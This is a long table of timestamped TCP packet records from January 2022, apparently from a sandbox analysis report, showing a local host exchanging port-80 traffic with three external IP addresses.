Jan 9, 2022 18:48:41.237718105 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.237740040 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237770081 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.237787962 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237828970 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237864971 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237890005 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.237911940 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237940073 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.237960100 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.237999916 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.238043070 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.238064051 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.238087893 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.238115072 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.238135099 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.238176107 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.238213062 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.238243103 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.238270044 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.238291025 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.264636040 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.265752077 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.286379099 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286425114 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286463976 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286500931 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286545038 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.286554098 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286585093 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.286604881 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286647081 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286678076 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.286698103 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286736965 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286776066 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286806107 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.286824942 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286869049 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286875010 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.286911011 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286937952 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.286957026 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.286995888 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287030935 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.287048101 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287086010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287132978 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287147999 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.287172079 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287209988 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287241936 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.287257910 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287292957 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.287308931 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287348986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287370920 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.287395954 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287427902 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287465096 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.287478924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287518978 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287540913 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.287560940 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287600040 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287632942 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.287650108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287691116 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287730932 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287772894 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287806988 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.287825108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287866116 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287885904 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.287909031 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287945032 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.287980080 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.287993908 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288036108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288081884 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288094997 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.288124084 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288157940 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.288166046 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288247108 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.288589001 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288628101 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288676023 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288713932 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.288773060 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288814068 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288882971 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288892031 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.288928032 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.288969994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.289012909 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.289025068 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.289026022 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.289068937 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.289108038 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.289148092 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.289172888 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.289194107 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.289233923 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.289246082 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.289285898 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.289324999 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.289354086 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.289361954 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.289391994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.289407969 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.289468050 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.299134016 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:41.303172112 CET	80	49859	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:41.303275108 CET	49859	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:41.303401947 CET	49859	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:41.482757092 CET	80	49859	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:41.540379047 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:41.599544048 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:41.776443005 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:41.776537895 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:41.776674986 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:41.995548010 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.309669971 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.309726000 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.309765100 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.309809923 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.309825897 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.309855938 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.309904099 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.309905052 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.309947968 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.309988022 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.310009003 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.310033083 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.310084105 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.310090065 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.310254097 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.429554939 CET	49861	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:42.486613989 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.486673117 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.486716032 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.486747980 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.486773968 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.486819983 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.486833096 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.486865997 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.486906052 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.486927986 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.486951113 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.486995935 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.487004042 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.487040043 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.487080097 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.487123966 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.487132072 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.487168074 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.487210989 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.487226963 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.487260103 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.487267017 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.487302065 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.487344980 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.487354994 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.487390041 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.487432957 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.487443924 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.487478971 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.490231037 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.610702991 CET	80	49861	187.232.210.249	192.168.2.3
Jan 9, 2022 18:48:42.611284018 CET	49861	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:42.664443016 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.664488077 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.664520025 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.664551973 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.664606094 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.664658070 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.664666891 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.664695978 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.664700031 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.664741993 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.664752960 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.664789915 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.664833069 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.664849043 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.664882898 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.664917946 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.664959908 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665002108 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665013075 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.665050030 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665095091 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665105104 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.665139914 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665182114 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665226936 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665235996 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.665267944 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665309906 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665327072 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.665359974 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665364027 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.665401936 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665446997 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665453911 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.665488958 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665533066 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665543079 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.665577888 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665615082 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665658951 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665667057 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.665702105 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665745020 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665756941 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.665798903 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.665798903 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665838957 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665880919 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665890932 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.665925980 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665967941 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.665982008 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.666013002 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.666224957 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.666397095 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.666438103 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.666476011 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.666518927 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.666534901 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.670238018 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.842511892 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.842577934 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.842608929 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.842639923 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.842694044 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.842751980 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.842761993 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.842792988 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.842792988 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.842838049 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.842854977 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.842891932 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.842933893 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.842951059 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.842986107 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.842988014 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843030930 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843071938 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843086004 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.843115091 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843154907 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843173981 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.843205929 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843247890 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843290091 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843301058 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.843337059 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843381882 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843390942 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.843430996 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843432903 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.843475103 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843517065 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843528032 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.843564987 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843607903 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843619108 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.843652010 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843689919 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843733072 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843743086 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.843775988 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843818903 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843828917 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.843868971 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.843873978 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843916893 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843961000 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.843969107 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.844005108 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844048023 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844063044 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.844094038 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844132900 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844185114 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844189882 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.844228029 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844269991 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844285965 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.844320059 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.844322920 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844362974 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844402075 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844428062 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.844449043 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844491005 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844502926 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.844537020 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.844589949 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.846555948 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.846596003 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:42.846662998 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.957715988 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:42.963339090 CET	49861	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:42.963399887 CET	49861	80	192.168.2.3	187.232.210.249
Jan 9, 2022 18:48:43.021261930 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.021328926 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.021370888 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.021410942 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.021469116 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.021514893 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.021522999 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.021544933 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.021563053 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.021608114 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.021620989 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.021655083 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.021699905 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.021709919 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.021749973 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.134258032 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134325027 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134358883 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134402037 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.134412050 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134454966 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134484053 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.134502888 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134542942 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134588957 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134598017 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.134630919 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134674072 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134690046 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.134727001 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134736061 CET	49860	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:43.134768009 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134810925 CET	80	49860	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:43.134826899 CET	49860	80	192.168.2.3	47.251.44.201
